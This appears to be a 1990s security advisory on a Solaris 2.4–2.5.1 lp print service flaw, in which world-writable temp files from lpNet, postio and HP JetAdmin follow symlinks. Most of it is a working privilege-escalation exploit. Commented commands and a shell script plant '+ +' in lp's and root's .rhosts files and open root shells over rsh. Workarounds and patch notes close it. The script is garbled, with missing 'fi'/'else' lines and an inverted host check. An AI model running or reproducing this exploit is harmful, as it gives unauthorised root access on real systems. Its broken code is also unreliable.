LpNet & temp files


    Solaris 2.4, 2.5, 2.5.1


    This is yet another temp  file/symlink to .rhosts problem.   Chris
    Sheldon discovered (rediscovered?) and tested this on an unpatched
    Solaris 2.5.1 system.   Also, HP JetAdmin  is used in  this script
    to break lp.

    This  problem  is  known  to  be  present  in the lp print service
    distributed with Solaris 2.4, 2.5 and 2.5.1.  Earlier versions  of
    Solaris may also be vulnerable.

    Remote  printing  to  the  local  spool  causes  a temp file to be
    created mode  666 owned  by lp  in /var/tmp.  This can  be used in
    conjunction with /var/lp/logs/lpsched, which is another temp  file
    created mode 666 owned by root, to break root by first  symlinking
    to  /usr/spool/lp/.rhosts,  becoming  lp,  symlinking  to /.rhosts
    and,  as  lp,  using  /usr/sbin/lpshut  to  cause  /.rhosts  to be
    created mode 666 owned by root.

    Anyway, here is exploit:

    # lpNet & temp file exploit:
    #   break lp, then use lp priv to break root (or bin, etc...).
    #   Written by: Chris Sheldon (
    #   Tested on Solaris-2.5.1:
    #     SunOS testhost 5.5.1 Generic sun4m sparc SUNW,SPARCstation-20
    #   Caveat: This system is running without patches. Sun released
    #     patch 103959-03 for 2.5.1 on Feb 27, 1997. lpNet and lpsched
    #     were replaced in that patch, but the patch README does not
    #     mention anything about a temp file or permissions problem.
    #     103959-03 is in the recommended patch list, but not in the
    #     "Patches containing security fixes" list.
    #   This way (not using HP JetAdmin) *seems* to only work when you have
    #   a postscript-only defined printer. If you send an ascii job to the
    #   print queue, lpNet will invoke several of the /usr/lib/lp/postscript
    #   programs to convert the ascii into postscript. One of them, postio(1),
    #   creates a temp file in /var/tmp mode 666. If the request is sent from
    #   a remote system (eg. handled by lpNet), then postio(1) runs as lp and
    #   creates /var/tmp/<printer-name>.log as lp mode 666.
    #   Here's part of the /var/lp/logs/request file:
    #   = lp0-71, uid -1, gid -1, size 123, Sat May  3 03:26:14 PDT 1997
    #   x /usr/lib/lp/postscript/postprint
    #   y /usr/lib/lp/postscript/download -plp0|/usr/lib/lp/postscript/postio \
    #       2>>$ERRFILE -L/var/tmp/lp0.log
    #   t simple
    #   What if you don't have a PS-only printer? Well, if you are using
    #   the HP JetAdmin software and are running the hpnp daemon, then
    #   you're just as vulnerable. The JetAdmin software creates a temp
    #   file /var/tmp/jadump as lp with mode 666. It's happily follows
    #   symlinks.
    #   So, then exploit essentially is:
    #     ln -s ~lp/.rhosts /var/tmp/<printer-name.log>
    #      -or-
    #     ln -s ~lp/.rhosts /var/tmp/jadump
    #     rsh somehost lp somefile.txt
    #     echo "+ +" >> ~lp/.rhosts
    #     rsh -l lp localhost /bin/sh -i
    #     mv /var/lp/logs/lpsched /var/lp/logs/
    #     ln -s /.rhosts /var/lp/logs/lpsched
    #     /usr/sbin/lpshut
    #     /usr/lib/lpsched
    #     mv /var/lp/logs/ /var/lp/logs/lpsched
    #     echo "+ +" >> /.rhosts
    #     rsh -l root localhost /bin/sh -i
    #  Note: This won't clobber the permissions on an existing /.rhosts
    #    file, but you can always symlink to /usr/bin/.rhosts.
    #  Workaround:
    #    Put "umask 022" in /etc/init.d/lp. /var/tmp/<printer-name>.log
    #      will be mode 644. This also makes /var/lp/logs/lpsched
    #      created as mode 644.
    #    For /var/tmp/jadump, the umask trick didn't work. I just made
    #    /usr/spool/lp 755 root/root (was 775 lp/lp).
    #  I suppose as a general principal, it's a good thing to go around
    #  as root and touch /.rhosts /usr/bin/.rhosts /usr/spool/lp/.rhosts
    #  and /var/adm/.rhosts as 600 root/root. I also run a script which
    #  checks the files (and their contents) on a regular basis.
    #  Perhaps there should be a file called /etc/rusers which, like the
    #  /etc/ftpusers file, denies any user in that file password-less
    #  r-service access.
    #  Of course, you still have to worry about things like .forward.
    #  A more draconian approach would be to change /var/spool/lp to
    #  mode 755 and owned by root. What would this break?? (anything?)
    #  This is the JetAdmin/hpnpd script:

    # Usage stuff.
    if [ "$1" = "" ]; then
      echo "Usage: lp-exp <remote-host> [remote printer name]"
      echo "         remote-host: host must have networked printer"
      echo "           with the main spool on the local system."

    # Specify a different queue
    if [ "$2" != "" ]; then

    # Check for ~lp/.rhosts
    if [ -f /usr/spool/lp/.rhosts ]; then
      echo "lp's .rhosts file exists... sorry"

    # Check if hpnpd is running
    if [ "`ps -e | grep hpnpd`" != "" ]; then
      echo "found hpnpd running"
      rm -f /var/tmp/jadump
      ln -s /usr/spool/lp/.rhosts /var/tmp/jadump
      echo "If you have a postscript only printer, try that (see comments)."

    # print some data on a remote system
    if [ "$remlp" = "" ]; then
      rsh $remlp "echo ASCII-STRING | lp"
      rsh $remlp "echo ASCII-STRING | lp -d$remqn"

    sleep 3

    # Check for the new .rhosts file and break root
    if [ -f /usr/spool/lp/.rhosts ]; then
      rm -f /var/tmp/jadump
      echo "+ +" >> /usr/spool/lp/.rhosts

      rsh -l lp localhost "rm /usr/spool/lp/.rhosts ;\
        mv /var/lp/logs/lpsched /var/lp/logs/ ;\
        ln -s /.rhosts /var/lp/logs/lpsched ;\
        /usr/sbin/lpshut ;\
        sleep 3 ;\
        /usr/lib/lpsched ;\
        mv /var/lp/logs/ /var/lp/logs/lpsched ;\
        echo \"+ +\" >> /.rhosts"
      echo "Hmmm... no .rhosts file was created."

    rsh -l root localhost /bin/sh -i


    This is quick and dirty:

        add "umask 022" to /etc/init.d/lp; restart /etc/init.d/lp
        su - root; touch /usr/spool/lp/.rhosts
        su - root; chown root /usr/spool/lp; chmod 755 /usr/spool/lp

    The  argumetns  to  the  specific  lp*  filters  are  defined   in

    In this case we have:

        /etc/lp/fd/postio.fd:Options: PRINTER * = -L/var/tmp/*.log
        /etc/lp/fd/postior.fd:Options: PRINTER * = -L/var/tmp/*.log

    The "*" is replaced by  the printername; the "right way  to modify
    this file is with "lpfilter" (not tested):

        echo 'Options: PRINTER * = -L/var/lp/*.log' | lpfilter -f postio -
        echo 'Options: PRINTER * = -L/var/lp/*.log' | lpfilter -f postior -

    For  patches  contact  your  vendor.   System  on  which  this was
    running has  been without  patches. Sun  released patch  103959-03
    for 2.5.1  on Feb  27, 1997.  lpNet and  lpsched were  replaced in
    that patch, but the patch  README does not mention anything  about
    a  temp  file  or  permissions  problem.   103959-03  is  in   the
    recommended  patch  list,  but  not  in  the  "Patches  containing
    security fixes" list.  4.1.2 doesn't do it.